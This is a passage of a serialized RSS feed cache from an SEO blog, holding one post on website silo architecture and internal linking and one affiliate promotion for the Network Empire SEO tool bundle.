type of siloing (using a helix link structure for the data hierarchy) is that the primary keyword (the most competitive phrase) gets ranked from the pooling link flow becoming buoyant underneath it and the category and supporting articles also get ranked as a side benefit (from the internal linking from the navigation).</p>\n<p>To take this a step further, you can mix the anchor text shingles and link back to the category / or silo landing page with multiple anchors (to create keyword stemming).</p>\n<p>Or, if you wanted to purely silo the page, then you would link in your navigation from the tier 3 pages back to your category page and use the contextual links from the nested supporting articles to link to the primary silo landing page (and not link across to other silos or silo landing pages from any category) only the parent or grandparent (Silo Landing Page).</p>\n<p>Building sites in this method produce tectonic shifts in rankings, the only thing you need to is (a) continue to drip fresh content and (b) start link building using deep links to the silo landing page or the category pages.</p>\n<p>There is no need to link to the supporting articles, unless you want to give them a boost, since, over time, they too will rank (from sharing the collective PageRank and link-flow of the theme cluster you created).</p>\n<h3>Website Silo Architecture SEO Tools Under Development</h3>\n<p>Siloing can be difficult, which is why to make this simple, this feature has been integrated into our upcoming theme WP Ultimate (which is still undergoing fine tuning). We will however, be releasing our plugin the WP Silo Importer that works in tandem with <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\">Domain Web Studio</a> and allows you to build theme relevant optimized WordPress sites in minutes (instead of painstakingly publishing dozens or hundreds of pages by hand).</p>\n<p>In order to use the advanced silo importer, you will require a subscription to DWS. But we also have a basic silo importer inside <strong>&#8220;<a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/sneak-peak-of-the-wp-ultimate-theme-by-seo-design-solutions%E2%84%A2/\">The WP Ultimate Theme</a>&#8220;</strong> that allows you to quickly and easily create categories and nested posts on the fly.</p>\n<p>The advanced silo importer however is far superior and adds a parent silo landing page, ties the category (using a page not a post) to keep link flow buoyant (so your rankings stick) and then uses the posts as the last tier after the categories.</p>\n<p>The <strong>WP Silo Importer Plugin</strong> (released within 7-10 days to the DWS community) also uses shortcode which you can inject into pages or sidebars to instantly build our all of the navigational elements for theming your content. Doing this by hand on a 100 page site would take hours, with our plugin, merely seconds.</p>\n<p>So, the takeaway is, proper planning from theming the website at the beginning of a campaign, combined with tactful supporting content and site structure can save you months on the way to page one and allow you to rank for multiple keywords with 1/10th of the links as a mixed-fruit website.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=zVJma9RiWtY:_CZ_6pXgeZg:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/zVJma9RiWtY\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:314:\"To draw on a visual analogy, most websites are like the image of mixed fruit below (which makes it difficult for a search engine to determine the topicality or relevance of the website (or more importantly the page) when trying to determine what to rank that page for or why. Website silo architecture is the [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"21\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:102:\"http://www.seodesignsolutions.com/blog/seo-resources/website-silo-architecture-seo-siloing-simplified/\";}s:7:\"summary\";s:314:\"To draw on a visual analogy, most websites are like the image of mixed fruit below (which makes it difficult for a search engine to determine the topicality or relevance of the website (or more importantly the page) when trying to determine what to rank that page for or why. Website silo architecture is the [...]\";s:12:\"atom_content\";s:13084:\"<p>To draw on a visual analogy, most websites are like the image of mixed  fruit below (which makes it difficult for a search engine to determine  the topicality or relevance of the website (or more importantly the  page) when trying to determine what to rank that page for or why.</p>\n<div id=\"attachment_9094\" class=\"wp-caption aligncenter\" style=\"width: 293px\"><a href=\"http://www.seodesignsolutions.com/blog/seo-resources/website-silo-architecture-seo-siloing-simplified/\"><img class=\"size-full wp-image-9094\" title=\"mixed-fruit\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/01/mixed-fruit.jpg\" alt=\"Mixed Fruit\" width=\"283\" height=\"424\" /></a><p class=\"wp-caption-text\">Most Websites Are Structured Like The Image Above</p></div>\n<p>Website silo architecture is the process of implementing a structure whereby each topic is housed in it&#8217;s own mini-site within the site and the internal linking pushes ranking factor back up to the primary / topic page otherwise dubbed the &#8220;silo landing page&#8221;.</p>\n<p>While SEO is simpler than most so called &#8220;experts&#8221; imply, it&#8217;s like the difference between a short order cook and a chef, they both cook food and often use the same ingredients, but it’s how they use them that matters.<span id=\"more-9096\"></span></p>\n<p>Similarly, when you dial in the appropriate on page and off page SEO using website silo architecture, then regardless of whether your website is aged or new, a website which previously had zero presence can instantly sprout wings and start ascending the SERPs (search engine result pages) to the top 5 results.</p>\n<p>On the contrary, if your execution lacks the proper structure for the granular ingredients, then lackluster results are sure to follow. You have to (a) understand your topic (b) create a top down model (starting from broad phrases to specific categories and supporting content) and (c) put each thing in its proper place.</p>\n<p>So, what is the proper way to structure a result-driven SEO campaign? Here’s our take on five fundamental methods which we have deemed evergreen SEO principles we’ve used for years to create proven results.</p>\n<ol>\n<li>Proper Title and URL structure.</li>\n<li>Proper H1 Use (to mirror title and URL).</li>\n<li>Proper site structure (cascading tiers of relevance).</li>\n<li>Theme relevant internal linking.</li>\n<li>The proper amount of link flow (to reach and exceed the tipping point).</li>\n</ol>\n<h3>Proper Title and URL Structure</h3>\n<p>By using specific shingles (groups of words) in the title (with prominent keywords first) you send the strongest SEO signal to search engines (as they attempt to determine the topic of your page).</p>\n<p>The more diffused (or verbose) a title is, the less effective it is for SEO. For example, if I am trying to rank for <strong>insurance rates</strong>, then those shingles should be the sole or primary page title as well as the URL structure should follow suit such as domain.com/insurance-rates/</p>\n<p>While conversion cues must be balanced with SEO, it is possible to get the best of both worlds through using synonyms or plural variations in the title while keeping it succinct and relevant.</p>\n<p>For example, a title such as -  Insurance Rates: Find the Best Rate and Affordable Prices! (<strong>which also includes keywords like best, prices, rate and rates</strong>) in case consumers use a long-tail query, then your landing page can rank for all potential variations of any of the shingles.</p>\n<h3>Proper H1 Usage</h3>\n<p>Using the proper H1 tag (header tag) is a common tried and true SEO technique; if you use <a href=\"http://www.seodesignsolutions.com/blog/how-to-reference-material/how-to-theme-and-silo-your-wordpress-blog/\">WordPress</a> then your permalink (page title) can easily be switched to your H1 tag by simply changing your style sheet.</p>\n<p>If you are using other CMS (<a href=\"http://www.seodesignsolutions.com/blog/seo-resources/creating-hybrid-staging-areas-for-legacy-cms-and-non-seo-friendly-crm-platforms/\">content management systems</a>) or static html pages, similarly, the suggestion to mirror your title and URL structure with the primary keyword is ideal. Such as the example above, the H1 tag should be <strong>“Insurance Rates”</strong>.</p>\n<p>One little trick is, you can also make the H1 (Header Tag / Text) a link and link that either to the home page or pass that ranking factor on to another page you intend to rank. If you are properly theming your website using website silo architecture, then it is possible to feed the primary silo landing page from your category pages this way (to page rank flows up and back to the primary landing page) from nested pages that support the category.</p>\n<h3>Proper Site Structure</h3>\n<p>Think of your website in tiers, those tier represent the natural data hierarchy of your website. Starting with your home page (in the root folder), this is tier 1 and the starting point for your SEO.</p>\n<p>The root folder is the natural destination for your most prominent pages and should house your primary landing pages in the first tier. This is because eventually, all the nested pages will pass their link-flow back to the root and you can scale laterally with multiple silo landing pages for competitive keywords and markets.</p>\n<p>Here is a visual aid to assist provided by <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\">Network Empire</a>.</p>\n<div id=\"attachment_9095\" class=\"wp-caption aligncenter\" style=\"width: 325px\"><img class=\"size-full wp-image-9095\" title=\"sample-silo\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/01/sample-silo.jpg\" alt=\"\" width=\"315\" height=\"369\" /><p class=\"wp-caption-text\">Sample of Properly Siloed Website</p></div>\n<p>Using the example from above, domain.com/insurance-rates  – would be my Silo Landing Page, i.e. the keyword I want to rank for. Now, by adding relevant categories and supporting articles, you can give any landing /silo page wings in the SERPs (search engine result pages).</p>\n<h3>Theme-Relevant Internal Linking</h3>\n<p>To implement theme-relevant internal linking, It is linked from my homepage with the keyword “insurance rates” as the anchor text to reinforce it. I would also use contextual anchor text links to any other silo landing pages that need tier one link flow to support them.</p>\n<p>By writing a contextual article and linking to the silo landing pages from the homepage, any link juice my homepage receives, get ring-fenced and passed along to the on page editorial links (the silo landing pages / preferred keyword landing pages) by design.</p>\n<p>The next tier is your category pages; these will become the hub page that sites on tier 2 one folder away from the root.</p>\n<p>The category page and primary landing page share a similar URL structure, but the primary landing page is the grandparent and the category parent, next up the posts or supporting articles are the children of the parent/category page.</p>\n<p>For example (to support my silo landing page, I would create a category called <strong>“affordable insurance rates”</strong> since it is thematically relevant to the silo landing page.</p>\n<p>On that page, if I wanted to use the H1 tag to link back to the primary landing page with <strong>“insurance rates”</strong> it would pass along that link flow, when I add the tier 3 pages (blog posts/products or articles) depending on the type of site you are building.</p>\n<p>Domain.com/insurance-rates/affordable-insurance-rates/ &#8211; whereby the silo landing page becomes the grandparent, the category the parent and the post/supporting article becomes the child.</p>\n<p>The third tier would be used for adding supporting content under the nested <strong>theme relevant category</strong> which has the primary purpose of acting as a controlled portion of the website to administer all content that contains the primary or secondary keywords associated with the primary silo landing page.</p>\n<h3>Adding the Proper Amount of Link-Flow</h3>\n<p>Link flow is created from linking from page to page with the appropriate anchor text. <a href=\"http://www.seodesignsolutions.com/blog/seo-consulting/which-links-pass-the-most-weight-in-search-engines/\">Link-flow</a> also takes the number of inbound and outbound links in addition to the strength and thematic relevance of the links. Siloing passes maximum link flow by capping contextual links (from only linking within the silo) and each page is linked via navigation by virtue of the category.</p>\n<p>As an example, if I added supporting articles to the affordable insurance rates category they would also be theme related and contain a contextual link that linked back to my category page, which in turn links to my silo landing page (primary landing page in the root).</p>\n<p>I would add pages like:</p>\n<ul>\n<li>Best insurance rates</li>\n<li>Save money on insurance</li>\n<li>Compare insurance rates</li>\n</ul>\n<p>And each would become a post attached to the category, such as: domain.com/insurance-rates/affordable-insurance-rates/compare-insurance-rates</p>\n<p>And have navigational links to everything in that category, while linking back to the silo landing page with the contextual keyword it is trying to rank for “insurance rates”.</p>\n<p>The benefit to this type of siloing (using a helix link structure for the data hierarchy) is that the primary keyword (the most competitive phrase) gets ranked from the pooling link flow becoming buoyant underneath it and the category and supporting articles also get ranked as a side benefit (from the internal linking from the navigation).</p>\n<p>To take this a step further, you can mix the anchor text shingles and link back to the category / or silo landing page with multiple anchors (to create keyword stemming).</p>\n<p>Or, if you wanted to purely silo the page, then you would link in your navigation from the tier 3 pages back to your category page and use the contextual links from the nested supporting articles to link to the primary silo landing page (and not link across to other silos or silo landing pages from any category) only the parent or grandparent (Silo Landing Page).</p>\n<p>Building sites in this method produce tectonic shifts in rankings, the only thing you need to is (a) continue to drip fresh content and (b) start link building using deep links to the silo landing page or the category pages.</p>\n<p>There is no need to link to the supporting articles, unless you want to give them a boost, since, over time, they too will rank (from sharing the collective PageRank and link-flow of the theme cluster you created).</p>\n<h3>Website Silo Architecture SEO Tools Under Development</h3>\n<p>Siloing can be difficult, which is why to make this simple, this feature has been integrated into our upcoming theme WP Ultimate (which is still undergoing fine tuning). We will however, be releasing our plugin the WP Silo Importer that works in tandem with <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\">Domain Web Studio</a> and allows you to build theme relevant optimized WordPress sites in minutes (instead of painstakingly publishing dozens or hundreds of pages by hand).</p>\n<p>In order to use the advanced silo importer, you will require a subscription to DWS. But we also have a basic silo importer inside <strong>&#8220;<a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/sneak-peak-of-the-wp-ultimate-theme-by-seo-design-solutions%E2%84%A2/\">The WP Ultimate Theme</a>&#8220;</strong> that allows you to quickly and easily create categories and nested posts on the fly.</p>\n<p>The advanced silo importer however is far superior and adds a parent silo landing page, ties the category (using a page not a post) to keep link flow buoyant (so your rankings stick) and then uses the posts as the last tier after the categories.</p>\n<p>The <strong>WP Silo Importer Plugin</strong> (released within 7-10 days to the DWS community) also uses shortcode which you can inject into pages or sidebars to instantly build our all of the navigational elements for theming your content. Doing this by hand on a 100 page site would take hours, with our plugin, merely seconds.</p>\n<p>So, the takeaway is, proper planning from theming the website at the beginning of a campaign, combined with tactful supporting content and site structure can save you months on the way to page one and allow you to rank for multiple keywords with 1/10th of the links as a mixed-fruit website.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=zVJma9RiWtY:_CZ_6pXgeZg:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/zVJma9RiWtY\" height=\"1\" width=\"1\"/>\";}i:19;a:12:{s:5:\"title\";s:37:\"3 SEO Tools to Crush Your Competition\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/5QuEJFZhVcg/\";s:8:\"category\";s:65:\"SEO ToolsDomain Web StudioDWSNetwork EmpireSEO Project Management\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Tue, 10 Jan 2012 12:36:12 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9084\";s:7:\"content\";a:1:{s:7:\"encoded\";s:14986:\"<p>Our friends at Themezoom/Network Empire have an exclusive, <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\"> limited-time offer</a> allowing you to access exclusive tools like the Krakken, The  Last Keyword Tool and Domain Web Studio (DWS) at a significant savings off normally published prices.</p>\n<div id=\"attachment_9085\" class=\"wp-caption aligncenter\" style=\"width: 460px\"><a href=\"http://www.seodesignsolutions.com/blog/\"><img class=\"size-full wp-image-9085\" title=\"3-seo-tools\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/01/3-seo-tools.jpg\" alt=\"3 SEO Tools\" width=\"450\" height=\"600\" /></a><p class=\"wp-caption-text\">3 SEO Tools To Crush Your Competitors</p></div>\n<p>Whether you are an agency (who has clients), an affiliate (looking to leverage your assets for maximum ROI) or a small business owner (trying to carve you own slice of  a market), these tools represent the pinnacle  of market research, SEO implementation and  syndication, allowing you to  create an unfair advantage over your  competition.<span id=\"more-9084\"></span></p>\n<p>There are 3 videos below (each is over 1 hour) and shows you how to unleash the power of DWS (using data from the Krakken and Last Keyword Tool).  Consider them your training videos (after you <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\">sign up</a>) and you can watch the layers unfold. Keep in mind, these offers will not last long, so take action or pay the full price later (you have been warned).</p>\n<p>These are not common ideas or loose theory, they are methods we use to literally dominate search engines for competitive verticals for our clients and ourselves.</p>\n<p>We start with the silo framework module and take keyword research and <strong>theme the website architecture</strong>, from there, we move on the <strong>the DNA braid</strong> and put together the on page and off page internal / backlink profile and see how steep the competition is, then we move to the third step in the <strong>Project Management Module</strong> and coordinate the team, structure the on-site content and then push the site live and start promoting it through the syndication blueprint. Trust me, give yourself a few hours, watch the videos and then <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\">get access</a> to these tools before they go underground again.</p>\n<h3>The Silo Framework Module</h3>\n<p><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"500\" height=\"369\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"src\" value=\"http://www.youtube.com/v/BUdXkYC4tJQ?version=3&amp;hl=en_US&amp;rel=0\" /><param name=\"allowfullscreen\" value=\"true\" /><embed type=\"application/x-shockwave-flash\" width=\"500\" height=\"369\" src=\"http://www.youtube.com/v/BUdXkYC4tJQ?version=3&amp;hl=en_US&amp;rel=0\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>To get the job done you need the right tools and having advanced SEO tools like DWS, Krakken and The Last Keyword Tool are critical for accessing intel that allow you to (1) assess your market (2) data mine competitors and (3) implement exclusive tactics from a vantage point that few competitors are privileged enough to observe.</p>\n<p>Superior intel allows you to work smarter and identify weaknesses, overlooked niche phrases and markets that overlap on the way <strong>up the ladder</strong> to the more lucrative / crowning <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/informative-seo-guide-from-seo-design-solutions/\">market-defining keywords</a>.</p>\n<p>But, if you didn’t know what those market defining phrases were, or whether or not those keywords have <strong>“actual”</strong> dollars attached to their rankings (once you reach the top 3 positions of the traffic band); then you could waste weeks, months or years of time chasing <em>phantom-like</em> silhouettes that merely deliver a fraction of the traffic you had over zealously anticipated.</p>\n<p>Wasting time is not an option.  Insulate yourself from futility of targeting duds by using metrics like the Krakken&#8217;s <strong>Total Search Market Value</strong> (TSMV). TSMV is an assessment for each market that corresponds to a dollar figure based on organic and PPC ranking value.</p>\n<p>This way, once you now <strong>where the money is</strong>, and whether or not there is commercial intent, you can tactfully implement <a href=\"http://www.seodesignsolutions.com/blog/seo-videos/seo-video-how-to-properly-silo-your-website/\">website silo architecture</a> to scale a plethora of lucrative keywords (like layers of an onion) through using one or multiple websites.</p>\n<p>Using multiple properties allows you to liberate your revenue model from being overly dependent on any one property. To accomplish this feat, you need a solid strategy and system based repeatability that targets entire cluster of phrases, (The DNA Braid) vs. a few poultry keywords.</p>\n<h3>The DNA Braid Module</h3>\n<p><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"500\" height=\"369\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"src\" value=\"http://www.youtube.com/v/UU61MNyQKvw?version=3&amp;hl=en_US&amp;rel=0\" /><param name=\"allowfullscreen\" value=\"true\" /><embed type=\"application/x-shockwave-flash\" width=\"500\" height=\"369\" src=\"http://www.youtube.com/v/UU61MNyQKvw?version=3&amp;hl=en_US&amp;rel=0\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>Would you rather rank for one keyword or rank for hundreds to thousands of keywords, that allow you to reach that “one” keyword faster while you enjoy the fruit of <a href=\"http://www.seodesignsolutions.com/blog/seo-tips/seo-rankings-and-how-to-create-them/\">keyword stemming</a> (ranking for stemmed variations) along the way?</p>\n<p>Time is the real asset in SEO and the extent of the volume of work you can accomplish depends on the tools you have at your disposal, and the team that you have to implement those tactics; especially when it comes to SEO and competing in saturated markets.</p>\n<p>To use an analogy, working with the wrong tools (against a seasoned competitor) is like bringing 3 men to a battle when your adversary has an army. No matter what strategy you implement (with those 3 men) their limited scope and resources will fall short when <strong>the numbers game</strong> creeps into the equation.</p>\n<p>For a website to knock an authority site off the pedestal of the #1 position, it needs both (1) a foundation that is broad enough to support the ascent (by leveraging semantically structured supporting content) and (2) enough vertical milestones (categories and landing pages) to reach the apex for the primary phrase. This means for competitive markets, you may require thousands of pages (to support the mid tail and lucrative / competitive keywords) and dozens to hundreds of links to critical internal pages to reach the aggregate tipping point to reach the apex of a market.</p>\n<p>But also keep in mind, that for every primary keyword, there are dozens of mid-tail and long-tail keywords that are equally as lucrative (if you devour the entire market along the way).</p>\n<h3>The Project Management Module</h3>\n<p><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"500\" height=\"369\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"src\" value=\"http://www.youtube.com/v/QiSJJP4WiAY?version=3&amp;hl=en_US&amp;rel=0\" /><param name=\"allowfullscreen\" value=\"true\" /><embed type=\"application/x-shockwave-flash\" width=\"500\" height=\"369\" src=\"http://www.youtube.com/v/QiSJJP4WiAY?version=3&amp;hl=en_US&amp;rel=0\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>To create websites and manage the process (using clusters and co-occurrence), you need a scalable system that allows you to (a) identify keyword and markets (b) model data, cost, time management and resources and calculate ROI from <a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/the-psychology-of-a-click-through-understanding-intention-fulfillment-and-desire/\">click through rates</a>, time to rank, the volume of content and internal links required per keyword or the number of deep links you will need (<em>that was our proprietary algorithm and you can see it work in Video 1 on the silo framework module above</em>) &#8211; that is the power of DWS, Krakken and The Last Keyword Tool; that is the collective suite known as <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\">Network Empire</a>.</p>\n<p>The volume and extent of the work you execute depends on the system and tools you have at your disposal, especially when SEO and competitive saturated markets are the battleground.</p>\n<p>Working with advanced SEO tools allows you to plan your roll-out with more depth, a more robust array of theme relevant supporting articles, categories and landing pages and allows you to work smarter and not harder when chipping away at market defining phrases.</p>\n<p>I have had the distinct honor of working with some of the most brilliant minds (the team from Themezoom) over the past 5 years and I can assure you that there are only a handful of people who understand and implement SEO on this level.</p>\n<p>While this was our best kept secret for years <strong>“The Krakken”</strong>, now it is time to borrow a phrase from Hades from Clash of the Titans and <strong>“Release the Krakken”!</strong></p>\n<p>This suite will allow you to walk into a market cold and within 20 minutes have the creamy keywords that float to the top in which to base your existing legacy site (by breathing life into it with a new blog) or start anew and scale the market in a fraction of the time.</p>\n<p>If you are struggling to find theme relevant keywords (based on sophisticated information retrieval algorithms such as sparse matrix clustering, co-occurrence, Bayes, PaIR, LSI and semantic connectivity) then the Krakken (which drills into 60-90,000 keywords in under 5 minutes) only brings you back phrases which are (1) theme relevant to the parent cluster (original keyword) and (2) either have organic search value or PPC search value.</p>\n<p>When you continue to refine, add synonyms and keep drilling, you end up with the perfect blueprint (like a skeleton) in which to build out your website into a robust authority site or niche specific entity.</p>\n<p>This means that if you include these phrases (in their respective website silo architecture) then the entire cluster gets devoured and you rank for more keywords with fewer inbound links (since your own website becomes its own PageRank and link-flow spewing, top 10 ranking juggernaut).</p>\n<p>Keep in mind that the Krakken transcends ordinary keyword research and uses the same type of natural data hierarchy information retrieval structures (such as Google, Yahoo and Bing) use to ascertain relevance.</p>\n<p>In short, a blueprint from the Krakken is like mirroring the ideal on page SEO elements, synonyms and synonymic sets search engines grade relevance score with as a conditional metric when analyzing authoritative websites and sorting the wheat from the chaff for positioning.</p>\n<p>Rarely would I share the exact tools we use to inspect, enter and  dominate markets, but in the spirit of the New Year I do have one  special offer I have been permitted to pass along (for a very limited  time) to all of you who either get our email / blog posts, read  whitepapers and updates from our plugin SEO Ultimate or know who we are  and what we do.</p>\n<p>In this special offer you get the opportunity to (1) unleash the Krakken in your market (2) it’s powerful and quite formidable little brother “The Last Keyword Tool” and (3) the DWS (Domain Web Studio) the most powerful SEO management suite ever conceived for:</p>\n<p><strong>a)</strong> mapping out markets</p>\n<p><strong>b)</strong> creating properly themed websites with silo site architecture</p>\n<p><strong>c)</strong> managing all elements of the campaign from outsourcing content creation, project management, web development and SEO tasks and most importantly</p>\n<p><strong>d)</strong> having a syndication blueprint that creates a timeline for every keyword, assesses its cost, time to rank, ROI and even lets you know how to cross the tipping-point with every keyword in a blueprint.</p>\n<p>Put simply, this bundle is a must! We have paid $12,000 a year just to use the Krakken, in this offer, you will have to <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\">click and see for yourself</a> the savings you can receive.</p>\n<p>Do yourself a favor; you can win the battle before you even step on the field. I speak from experience on this one, we can do more in less time and completely crush seasoned competitors (such as brands, Wikipedia results, Amazon, Target, Wal-mart and other “strong sites”) using the formula’s developed from building sites (and links) in tandem with a search engines natural data hierarchy – and that is what you will learn from using this suite .</p>\n<p>In essence, Network Empire silently slays competitors and uses unstoppable algorithms (that search engines love and reward), and now, for a limited time you can save hundreds by <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\">following this link</a> and getting your subscription for a hefty discount.</p>\n<p>In closing, for those naysayers, here are links to an exclusive webinar on the DWS 3.5 launch and other videos on the Krakken and The Last Keyword Tool.</p>\n<p>This is not a marketing ploy; this is a special offer with bona fide savings for those of you who are serious about dominating your market. This offer will not last and will be pulled in the next 24-48 hours. Act now, or pay full price later. I leave the rest to you…</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=5QuEJFZhVcg:Ocd5kHoh-_M:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/5QuEJFZhVcg\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:357:\"Our friends at Themezoom/Network Empire have an exclusive, limited-time offer allowing you to access exclusive tools like the Krakken, The Last Keyword Tool and Domain Web Studio (DWS) at a significant savings off normally published prices. Whether you are an agency (who has clients), an affiliate (looking to leverage your assets for maximum ROI) or [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"14\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:87:\"http://www.seodesignsolutions.com/blog/seo-tools/3-seo-tools-to-crush-your-competition/\";}s:7:\"summary\";s:357:\"Our friends at Themezoom/Network Empire have an exclusive, limited-time offer allowing you to access exclusive tools like the Krakken, The Last Keyword Tool and Domain Web Studio (DWS) at a significant savings off normally published prices. Whether you are an agency (who has clients), an affiliate (looking to leverage your assets for maximum ROI) or [...]\";s:12:\"atom_content\";s:14986:\"<p>Our friends at Themezoom/Network Empire have an exclusive, <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\"> limited-time offer</a> allowing you to access exclusive tools like the Krakken, The  Last Keyword Tool and Domain Web Studio (DWS) at a significant savings off normally published prices.</p>\n<div id=\"attachment_9085\" class=\"wp-caption aligncenter\" style=\"width: 460px\"><a href=\"http://www.seodesignsolutions.com/blog/\"><img class=\"size-full wp-image-9085\" title=\"3-seo-tools\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/01/3-seo-tools.jpg\" alt=\"3 SEO Tools\" width=\"450\" height=\"600\" /></a><p class=\"wp-caption-text\">3 SEO Tools To Crush Your Competitors</p></div>\n<p>Whether you are an agency (who has clients), an affiliate (looking to leverage your assets for maximum ROI) or a small business owner (trying to carve you own slice of  a market), these tools represent the pinnacle  of market research, SEO implementation and  syndication, allowing you to  create an unfair advantage over your  competition.<span id=\"more-9084\"></span></p>\n<p>There are 3 videos below (each is over 1 hour) and shows you how to unleash the power of DWS (using data from the Krakken and Last Keyword Tool).  Consider them your training videos (after you <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\">sign up</a>) and you can watch the layers unfold. Keep in mind, these offers will not last long, so take action or pay the full price later (you have been warned).</p>\n<p>These are not common ideas or loose theory, they are methods we use to literally dominate search engines for competitive verticals for our clients and ourselves.</p>\n<p>We start with the silo framework module and take keyword research and <strong>theme the website architecture</strong>, from there, we move on the <strong>the DNA braid</strong> and put together the on page and off page internal / backlink profile and see how steep the competition is, then we move to the third step in the <strong>Project Management Module</strong> and coordinate the team, structure the on-site content and then push the site live and start promoting it through the syndication blueprint. Trust me, give yourself a few hours, watch the videos and then <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/bundle-offers/\">get access</a> to these tools before they go underground again.</p>\n<h3>The Silo Framework Module</h3>\n<p><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"500\" height=\"369\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"src\" value=\"http://www.youtube.com/v/BUdXkYC4tJQ?version=3&amp;hl=en_US&amp;rel=0\" /><param name=\"allowfullscreen\" value=\"true\" /><embed type=\"application/x-shockwave-flash\" width=\"500\" height=\"369\" src=\"http://www.youtube.com/v/BUdXkYC4tJQ?version=3&amp;hl=en_US&amp;rel=0\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>To get the job done you need the right tools and having advanced SEO tools like DWS, Krakken and The Last Keyword Tool are critical for accessing intel that allow you to (1) assess your market (2) data mine competitors and (3) implement exclusive tactics from a vantage point that few competitors are privileged enough to observe.</p>\n<p>Superior intel allows you to work smarter and identify weaknesses, overlooked niche phrases and markets that overlap on the way <strong>up the ladder</strong> to the more lucrative / crowning <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/informative-seo-guide-from-seo-design-solutions/\">market-defining keywords</a>.</p>\n<p>But, if you didn’t know what those market defining phrases were, or whether or not those keywords have <strong>“actual”</strong> dollars attached to their rankings (once you reach the top 3 positions of the traffic band); then you could waste weeks, months or years of time chasing <em>phantom-like</em> silhouettes that merely deliver a fraction of the traffic you had over zealously anticipated.</p>\n<p>Wasting time is not an option.  Insulate yourself from futility of targeting duds by using metrics like the Krakken&#8217;s <strong>Total Search Market Value</strong> (TSMV). TSMV is an assessment for each market that corresponds to a dollar figure based on organic and PPC ranking value.</p>\n<p>This way, once you now 